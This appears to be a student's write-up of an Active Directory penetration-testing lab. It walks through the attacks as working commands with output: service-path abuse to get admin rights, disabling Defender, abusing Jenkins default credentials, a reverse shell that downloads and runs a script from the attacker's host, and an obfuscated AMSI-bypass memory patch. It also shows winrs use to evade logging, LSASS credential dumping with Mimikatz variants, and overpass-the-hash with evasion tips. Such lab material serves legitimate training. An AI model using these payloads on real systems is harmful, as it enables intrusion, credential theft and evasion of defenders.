ModifiableFile : C:\
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False

ServiceName : edgeupdatem
Path : "C:\Program Files
(x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False

ServiceName : edgeupdatem
Path : "C:\Program Files
(x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False

[*] Checking service permissions...

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart : True

ServiceName : SNMPTRAP
Path : C:\Windows\System32\snmptrap.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart : True

[*] Checking %PATH% for potentially hijackable DLL locations...

ModifiablePath : C:\Users\student163\AppData\Local\Microsoft\WindowsApps
IdentityReference : dcorp\student163
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\student163\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath
'C:\Users\student163\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...

[*] Checking for modifiable schtask files/configs...

[*] Checking for unattended install files...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

[*] Checking for plaintext passwords in McAfee SiteList.xml files....

[*] Checking for cached Group Policy Preferences .xml files....

There’s an unquoted service path which we can use to escalate our privileges.
PS C:\Users\student163> Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student163' -
Verbose
VERBOSE: Service 'AbyssWebServer' original path: 'C:\WebServer\Abyss Web Server\abyssws.exe -
service'
VERBOSE: Service 'AbyssWebServer' original state: 'Stopped'
VERBOSE: Executing command 'net localgroup Administrators dcorp\student163 /add'
VERBOSE: binPath for AbyssWebServer successfully set to 'net localgroup Administrators
dcorp\student163 /add'
VERBOSE: Restoring original path to service 'AbyssWebServer'
VERBOSE: binPath for AbyssWebServer successfully set to 'C:\WebServer\Abyss Web
Server\abyssws.exe -service'
VERBOSE: Leaving service 'AbyssWebServer' in stopped state

ServiceAbused Command
------------- -------
AbyssWebServer net localgroup Administrators dcorp\student163 /add

Now if we logoff and login, we get admin privileges.

Disable Defender using PowerShell

Once we get administrative privileges, we disable Defender on the machine using the following
commands. The commands require administrative privileges.
PS C:\Windows\system32> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\Windows\system32> Set-MpPreference -DisableBehaviorMonitoring $true
PS C:\Windows\system32> Set-MpPreference -DisableIntrusionPreventionSystem $true
PS C:\Windows\system32> Set-MpPreference -DisableIOAVProtection $true
Jenkins Feature Abuse
A misconfigured Jenkins instance on (http://172.16.3.11:8080). There are 3 users present which can be
found when we access the People page in Jenkins.

Login works with the following usernames and passwords combination respectively.

manager/manager

builduser/builduser

With the username as builduser and password as builduser jobs can be configured. Since the build needs
to run with local administrative privileges, the user which runs the jobs is a local administrator on the
machine where Jenkins is hosted.

A project can be modified to get a reverse shell.

Getting a Reverse shell

Tools required
• Netcat – To configure a listener
• Invoke-PowershellTCP.ps1 - Nishang script which can be used for Reverse or Bind interactive
PowerShell from a target. (https://github.com/samratashok/nishang/blob/master/Shells/Invoke-
PowerShellTcp.ps1)
• HFS to host the webserver for transferring the scripts between the machines.
We will slightly modify the script Invoke-PowerShellTcp.ps1 to include the following line.
Power -Reverse -IPAddress 172.16.100.163 -Port 443

The IP address 172.16.100.163 is our student machine. We will configure a listener on our student
machine to receive a reverse shell on port 443.
C:\Windows\system32>C:\Ad\Tools\netcat-win32-1.12\nc64.exe -nvlp 443
listening on [any] 443 ...

We use HFS and host the PowerShell script Invoke-PowerShellTCP_modified on it.

We login to Jenkins with the builduser.

Open any Project in Jenkins and configure it to add a build step which runs a Windows batch command
and the command is as follows.
powershell iex (iwr -UseBasicParsing http://172.16.100.163/Invoke-PowerShellTcp_modified.ps1)
Once the project is saved, built it. Once the project runs, we receive a reverse shell from the machine
where Jenkins is installed.
connect to [172.16.100.163] from (UNKNOWN) [172.16.3.11] 59455
Windows PowerShell running as user ciadmin on DCORP-CI
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\.jenkins\workspace\Project9> $env:computername
DCORP-CI
PS C:\Users\Administrator\.jenkins\workspace\Project9> $env:username
ciadmin
PS C:\Users\Administrator\.jenkins\workspace\Project9> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::2fe8:dbc7:9c2c:2c5c%5
IPv4 Address. . . . . . . . . . . : 172.16.3.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.3.254

Note: Make sure to add an exception or turn off the firewall on the student VM.
Domain Enumeration using BloodHound
In this section, we will explore how to use BloodHound for domain enumeration. BloodHound is a
powerful tool used to identify and analyze the relationships and permissions within an Active Directory
environment. It helps in visualizing the attack paths and determining potential privilege escalation vectors.

Introduction to BloodHound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active
Directory domain. It collects data using a tool called SharpHound and then visualizes it in an easy-to-
understand graphical interface.

Components of BloodHound
SharpHound
• Data Collection: SharpHound is the data collector for BloodHound. It gathers data from the Active
Directory environment using various collection methods.
• Executable Versions: SharpHound is available in different formats, including a PowerShell script,
a .NET executable, and a C# assembly.

BloodHound Interface
• Graph Database: BloodHound uses a Neo4j graph database to store and query the collected data.
• Visualization: The BloodHound interface provides a graphical representation of the data, allowing
users to easily visualize and explore relationships and paths within the Active Directory
environment.

Setting up BloodHound environment

Prerequisites
Note: In the lab we have BloodHound Legacy available in C:\AD\Tools\Folder. We are also provided with
reader access to BloodHound community edition.

• Java Development Kit (JDK): Neo4j, the database used by BloodHound, requires Java. Ensure you
have the JDK installed.
• Neo4j Database: BloodHound uses Neo4j to store and query data.
• BloodHound Application: The BloodHound interface for analyzing and visualizing data.

Installation of neo4j database

We have neo4j database community edition version 4.4.5 in the C:\Ad\Tools folder.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> cd C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin
PS C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin> .\neo4j.bat install-
service
Neo4j service installed.

Now neo4j service is installed. We will start the service.

PS C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin> .\neo4j.bat start
Directories in use:
home: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5
config: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\conf
logs: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\logs
plugins: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\plugins
import: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\import
data: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\data
certificates: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\certificates
licenses: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\licenses
run: C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\run
Starting Neo4j.
Started neo4j. It is available at http://localhost:7474
There may be a short delay until the server is ready.

We will configure the neo4j database. For this we will open the browser and navigate to the address
http://localhost:7474. We need to login with the username neo4j and password neo4j.

Once logged in successfully, we have to provide a new password. We have used bloodhound as the new
password.

Once the configuration is complete, we can open Bloodhound interface using the following command.
C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64\BloodHound.exe

Once BloodHound opens, we can use the username neo4j and password bloodhound to login to it.

How BloodHound Collects Data

SharpHound collects data by querying the Active Directory domain using standard protocols and methods.
Here are the primary methods SharpHound uses:

LDAP Enumeration
Collects information about users, groups, computers, organizational units (OUs), group memberships, and
ACLs (Access Control Lists).

SMB and RPC Enumeration

Gathers session information, local admin group memberships, and shares from domain-joined machines.

Active Directory Web Services (ADWS)

Uses ADWS to gather detailed information about user and group attributes.

Event Logs
Parses event logs to find information about logon sessions and other relevant activities.
Types of Data Collected
• Users: Information about user accounts, including their group memberships and privileges.

• Groups: Details about security groups and their memberships.

• Computers: Information about computer objects and their relationships.

• Sessions: Active logon sessions on various machines.

• ACLs: Access Control Lists for objects in the domain, detailing who has what permissions.

• Trusts: Information about domain and forest trusts.

Data Collection Methods

SharpHound can use different collection methods based on the scope and requirements of the
assessment. Some of the commonly used collection methods include:

• Default: Collects a standard set of data, which is typically sufficient for most assessments.

• All: Collects all possible data, which can be more comprehensive but time-consuming.

• Stealth: Minimizes network traffic and detection risk by using fewer and less intrusive queries.

Using SharpHound
SharpHound is available in different formats, including a PowerShell script, a .NET executable, and a C#
assembly.

In our lab we will use the PowerShell script.

To Bypass .NET AMSI, we will use the following code.

$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string
procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
$BBWHVWQ =
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#
108;&#108;'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#
102;&#102;&#101;&#114;'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

Running the PowerShell script:

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> $ZQCUW = @"
>> using System;
>> using System.Runtime.InteropServices;
>> public class ZQCUW {
>> [DllImport("kernel32")]
>> public static extern IntPtr GetProcAddress(IntPtr hModule, string
>> procName);
>> [DllImport("kernel32")]
>> public static extern IntPtr LoadLibrary(string name);
>> [DllImport("kernel32")]
>> public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
>> dwSize, uint flNewProtect, out uint lpflOldProtect);
>> }
>> "@
PS C:\Windows\system32> Add-Type $ZQCUW
PS C:\Windows\system32> $BBWHVWQ =
>>
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#
108;&#108;'))")
PS C:\Windows\system32> $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
>>
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#
102;&#102;&#101;&#114;'))")
PS C:\Windows\system32> $p = 0
PS C:\Windows\system32> [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
True
PS C:\Windows\system32> $TLML = "0xB8"
PS C:\Windows\system32> $PURX = "0x57"
PS C:\Windows\system32> $YNWL = "0x00"
PS C:\Windows\system32> $RTGX = "0x07"
PS C:\Windows\system32> $XVON = "0x80"
PS C:\Windows\system32> $WRUD = "0xC3"
PS C:\Windows\system32> $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
PS C:\Windows\system32> [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
PS C:\Windows\system32> . C:\Ad\Tools\BloodHound-master\BloodHound-
master\Collectors\SharpHound.ps1
PS C:\Windows\system32> Invoke-BloodHound -CollectionMethod All -OutputDirectory
"C:\Users\student163\Desktop\shared"
2024-06-21T02:14:53.3972901-07:00|INFORMATION|This version of SharpHound is compatible with the
4.2 Release of BloodHound
2024-06-21T02:14:53.7410780-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin,
GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets,
PSRemote
2024-06-21T02:14:53.7723227-07:00|INFORMATION|Initializing SharpHound at 2:14 AM on 6/21/2024
2024-06-21T02:14:59.5887456-07:00|INFORMATION|Loaded cache with stats: 175 ID to type mappings.
181 name to SID mappings.
0 machine sid mappings.
5 sid to domain mappings.
0 global catalog mappings.
2024-06-21T02:14:59.6043610-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session,
LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-21T02:15:04.8821760-07:00|INFORMATION|Beginning LDAP search for
dollarcorp.moneycorp.local
2024-06-21T02:15:15.8976436-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-06-21T02:15:15.9131658-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-06-21T02:15:56.3983468-07:00|INFORMATION|Status: 118 objects finished (+118 2.313725)/s --
Using 79 MB RAM
2024-06-21T02:15:58.2097768-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-06-21T02:15:58.9128123-07:00|INFORMATION|Output channel closed, waiting for output task to
complete
2024-06-21T02:15:59.0846810-07:00|INFORMATION|Status: 209 objects finished (+91 3.87037)/s --
Using 81 MB RAM
2024-06-21T02:15:59.0846810-07:00|INFORMATION|Enumeration finished in 00:00:54.2178714
2024-06-21T02:15:59.2409793-07:00|INFORMATION|Saving cache with stats: 176 ID to type mappings.
182 name to SID mappings.
0 machine sid mappings.
5 sid to domain mappings.
0 global catalog mappings.
2024-06-21T02:15:59.2724980-07:00|INFORMATION|SharpHound Enumeration Completed at 2:15 AM on
6/21/2024! Happy Graphing!

The output is a zip file which contains the different Json files. We will upload this data to BloodHound
interface. Once the data is uploaded, we can map our Active directory environment using graphs.
The shortest path to Domain Admins looks like this.

We can analyze the Active Directory with the BloodHound Community as well. We can follow the article
to install it. Once installed, we need to download the latest data collector SharpHound and then collect
the data. The command line used to collect the data using SharpHound is the same.

In the Web UI, click on Cypher -> Click on the Folder Icon -> Pre-Built Searches -> Active Directory -> (Scroll
down) -> Shortest paths to Domain Admins.
Issue with Derivate Local Admin and BloodHound 4.2.0
The latest version of BloodHound (4.2.0) does not show Derivate Local Admin edge in GUI. The last version
where it worked was 4.0.3. It is present in the Tools directory as BloodHound-4.0.3_old. You can use it the
same way as above.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> $ZQCUW = @"

>> using System;
>> using System.Runtime.InteropServices;
>> public class ZQCUW {
>> [DllImport("kernel32")]
>> public static extern IntPtr GetProcAddress(IntPtr hModule, string
>> procName);
>> [DllImport("kernel32")]
>> public static extern IntPtr LoadLibrary(string name);
>> [DllImport("kernel32")]
>> public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
>> dwSize, uint flNewProtect, out uint lpflOldProtect);
>> }
>> "@
PS C:\Windows\system32> Add-Type $ZQCUW
PS C:\Windows\system32> $BBWHVWQ =
>>
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#
108;&#108;'))")
PS C:\Windows\system32> $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
>>
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#
102;&#102;&#101;&#114;'))")
PS C:\Windows\system32> $p = 0
PS C:\Windows\system32> [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
True
PS C:\Windows\system32> $TLML = "0xB8"
PS C:\Windows\system32> $PURX = "0x57"
PS C:\Windows\system32> $YNWL = "0x00"
PS C:\Windows\system32> $RTGX = "0x07"
PS C:\Windows\system32> $XVON = "0x80"
PS C:\Windows\system32> $WRUD = "0xC3"
PS C:\Windows\system32> $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
PS C:\Windows\system32> [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
PS C:\Windows\system32> . "C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-
master\Collectors\SHarpHound.ps1"
PS C:\Windows\system32> Invoke-BloodHound -CollectionMethod All -OutputDirectory
"C:\Users\student163\Desktop\shared\Bloodhound"
-----------------------------------------------
Initializing SharpHound at 2:50 AM on 6/21/2024
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups,
SPNTargets, Container

[+] Creating Schema map for domain DOLLARCORP.MONEYCORP.LOCAL using path

CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS

Status: 0 objects finished (+0) -- Using 72 MB RAM
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] Creating Schema map for domain MONEYCORP.LOCAL using path
CN=Schema,CN=Configuration,DC=moneycorp,DC=local
Status: 175 objects finished (+175 12.5)/s -- Using 98 MB RAM
Enumeration finished in 00:00:14.8166237
Compressing data to C:\Users\student163\Desktop\shared\Bloodhound\20240621025005_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 2:50 AM on 6/21/2024! Happy Graphing!

PS C:\Windows\system32> cd "C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64"
PS C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64> .\BloodHound.exe

We can use the same username and password which we have used previously. Before we upload the data,
we will clear the old database.
Once the data is uploaded, we will search our username (student163). In the Node Info tab, Click Local
Admin Rights and then Click Derivative Admin Rights. This will show if the user has any derivative
administrative rights on any machine.
From the screenshot, we can find that student163 has administrative privileges on the machine DCORP-
STD163. The user student163 also is a member of the RDPUsers group, which has administrative privileges
on the machine DCORP-ADMINSRV. So student163 also has administrative privileges on the machine
DCORP-ADMINSRV.

Note: We have tried two different versions of BloodHound Legacy in the lab and also tried enumerating
the environment using BloodHound CE. Not all the versions are giving full results. Hence it is advisable to
use all the tools for enumeration.
Lateral Movement
Lateral movement in cybersecurity is a technique where attackers, after intruding into an organization's
network, escalate privileges, exploit vulnerabilities, and more, to gain further access to assets and
resources.

Lateral movement is not an attack by itself, but a stage leading up to an attack. Attackers use that initial
access to compromise other accounts in the network to create a massive impact. It's a tactic
predominantly used in APTs whereby the attacker stays in the network undetected for an extended period
of time to gain access to more valuable assets or resources.

The stages of lateral movement

To stay hidden, the attacker moves laterally through the network slowly and in stages. The movement can
be divided into three stages:

Reconnaissance
Every move by an attacker is carefully planned to go undetected. Reconnaissance is the first stage of
lateral movement. Once the threat actor has gained a foothold into the network, they gather information
on the network, its devices, and users. This helps them tactically move through the network without
raising suspicion.
These are a few tools and techniques that attackers may use for reconnaissance:

• Nmap: A network scanner that finds details about a network and the protocols running on it.

• Metasploit: A popular reconnaissance tool that can be used to probe for any vulnerabilities in the
network or servers.

• Bloodhound: An AD reconnaissance tool that identifies the relationship between AD objects such
as computers, groups, and users.

• Responder: A tool that can be used to poison Link-Local Multicast Name Resolution (LLMNR),
NetBIOS Name Service (NBT-NS), and Multicast DNS (mDNS) protocols to intercept and respond
to network traffic and collect user authentication credentials.

• PowerSploit: A collection of PowerShell scripts that be used for reconnaissance.

• Recon-ng: An Open-Source Intelligence-based tool that is used for reconnaissance.

Credential dumping
This is the second stage of lateral movement. Once the attacker gains access to the network and has
studied it thoroughly, they will then attempt to elevate their privileges. This means that the attacker uses
privilege elevation techniques to gain access to user accounts and devices to move laterally through the
network.

Some of the common lateral movement techniques include:

• Kerberoasting: This technique extracts account credentials hashes from AD and cracks them
offline.

• Golden Ticket: This technique allows the attacker to forge Kerberos Ticket Granting Tickets,
thereby giving the attacker access to any resource on the AD.

• Silver Ticket: This technique allows the attacker to forge authentication tickets by cracking the
password hash of a service account. The attacker can use this to gain access to file shares, which
would allow them to find sensitive data and exfiltrate it.

• Keylogging: This records and tracks every key movement of the user, usually without their
knowledge. An attacker can use this to assemble user behavior and private data.

• Pass the hash: This is a technique where attackers use the password hash rather than the plain
text password to perform a valid NTLM authentication.

• Pass the ticket: This is a technique where attackers use stolen Kerberos tickets to authenticate to
a domain.

• RDP attack: This technique uses valid credentials to log in to a system remotely, and then perform
actions under the guise of the logged-in user.

• Server Message Block attack: This is a client-server communication protocol that can be abused
by attackers to access file shares, allowing them to move laterally through a network.
Gaining access
If the attacker manages to evade the security controls in place and elevate their privileges within the
network, they're eventually able to gain access to the desired sensitive data. Since the attacker does this
using legitimate credentials, they can avoid detection.

PowerShell Remoting
PowerShell Remoting is a powerful feature that allows us to run PowerShell commands or scripts on
remote systems. It is based on the Windows Remote Management (WinRM) service, which enables the
execution of commands across multiple machines. This is particularly useful in large environments where
administrative tasks need to be performed on numerous machines without physically accessing them.

Overview of PowerShell Remoting

PowerShell Remoting enables administrators to:

• Execute commands on remote systems.

• Run scripts on remote systems.

• Establish interactive remote sessions.

• Manage remote systems from a centralized location.

WinRM and PowerShell Remoting Ports

Default Ports

1. HTTP (Unencrypted)

o Port 5985: This is the default port for WinRM over HTTP. It is used for unencrypted
communication, which is not recommended for production environments due to security
concerns.

2. HTTPS (Encrypted)

o Port 5986: This is the default port for WinRM over HTTPS. It provides encrypted
communication using SSL/TLS, which is the recommended configuration for secure
remote management.

Enabling PowerShell Remoting

To enable PowerShell Remoting on a machine, we need to configure WinRM. This can be done using the
following command:
Enable-PSRemoting -Force

The command requires administrative privileges. This command performs the following actions:

• Starts the WinRM service.

 • Sets the WinRM service startup type to Automatic.

• Creates a listener to accept incoming remote requests.

• Enables a firewall rule that allows remote access.

Using PowerShell Remoting

Establishing a Remote Session
$session = New-PSSession -ComputerName RemoteComputer -Credential (Get-Credential)

Executing Commands on a Remote System

Once the session is established, we can execute commands using the Invoke-Command cmdlet:
Invoke-Command -Session $session -ScriptBlock { Get-Process }
Entering an Interactive Remote Session

For an interactive session, use the Enter-PSSession cmdlet:

Enter-PSSession -ComputerName RemoteComputer -Credential (Get-Credential)

This provides a command prompt on the remote system where we can run commands interactively.

Running Scripts on Remote Systems

We can also run entire scripts on remote systems using Invoke-Command:

Invoke-Command -Session $session -FilePath C:\Scripts\MyScript.ps1

Invoke-Command -ComputerName Computer1 -FilePath C:\Scripts\MyScript.ps1

Running Scripts on Multiple Remote Systems

Invoke-Command -Computername Computer1,Computer2 -Scriptblock { Get-Process }

Executing locally loaded functions on Remote machines

Invoke-Command -ComputerName Computer1 -ScriptBlock ${function:Get-PassHashes}

Invoke-Command -Session $session -ScriptBlock ${function:Get-PassHashes}

PowerShell remoting supports the system-wide transcripts and deep script logging. We can use winrs
instead of PowerShell remoting to evade logging.
winrs -r:Computer1 -u:Computer1\administrator -p:<Password> hostname
We can also use winrm.vbs and COM objects of WSMAN object (https://github.com/bohops/WSMan-
WinRM)

Dumping LSASS Credentials

Mimikatz can be used to dump credentials, tickets and many more interesting attacks.

Dumping Credentials from LSASS

Using Invoke-Mimikatz
Invoke-Mimikatz is a popular script that leverages the capabilities of the Mimikatz tool within PowerShell.
Using the code from ReflectivePEInjection, Mimikatz is loaded reflectively into the memory. All the
functions of Mimikatz could be used from this script. The script requires administrative privileges for
dumping the credentials from the local machine.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Using SafetyKatz
SafetyKatz enhances the stealth and effectiveness of using Mimikatz by leveraging dynamic downloading,
in-memory execution, and obfuscation techniques. It's a valuable tool for penetration testers and red
teamers who need to perform credential dumping and other activities with Mimikatz while minimizing
the risk of detection. SafetyKatz.exe is a compiled version of the SafetyKatz script.
Safetykatz.exe "sekurlsa::ekeys"

Using SharpKatz
SharpKatz is a C# port of the popular Mimikatz tool, designed to perform similar tasks such as extracting
credentials, hashes, and Kerberos tickets from memory, but with a focus on .NET environments. SharpKatz
provides an alternative to using the traditional Mimikatz tool and can be particularly useful in
environments where using a native C# tool is advantageous for evasion and operational flexibility
SharpKatz.exe --Command ekeys

Using Dumpert.exe
Dumpert is a tool designed to extract (or "dump") credentials from the Local Security Authority Subsystem
Service (LSASS) process memory on Windows systems. It is often used in penetration testing and red
teaming to capture credentials that are stored in memory, similar to the way Mimikatz operates. However,
Dumpert utilizes techniques to avoid detection by traditional security measures.
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Using pypykatz
Pypykatz is a Python implementation of Mimikatz, designed to extract credentials from the memory of
the Local Security Authority Subsystem Service (LSASS) on Windows systems. It offers a cross-platform
approach to credential dumping by utilizing Python, making it highly flexible and integrable into various
environments and automation scripts.
pypykatz.exe live lsa

If we are using a Linuz attack machine, we can use impacket and Physmem2profit

Important Note: Avoid interaction with the LSASS process as much as possible, since it is heavily
monitored by every EDR. First, we need to look for credentials in DPAPI (Browser Cookies), Credential
Vault, LSA Registry key, SAM hive since EDR is not monitoring them.

Overpass the Hash attacks

Once we have the credentials, we can reuse them using the tools and techniques outlined here.

Using Invoke-Mimikatz
This requires elevated privileges.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user to impersonate> /domain:<domain>
/aes256:<aes256 key of the user> /run:cmd.exe"'

Using SafetyKatz
This requires elevated privileges.
SafetyKatz.exe "sekurlsa::pth /user:<user to impersonate> /domain:<domain> /aes256:<aes256 key of
the user> /run:cmd.exe"' "exit"

For Overpass-the-Hash attacks, RC4 hashes can be used, but it is recommended to use AES keys instead,
as they are more operational security (OPSEC) safe. When RC4 hashes are used, tools like Microsoft
Defender for Identities can easily flag them as an Encryption Downgrade.

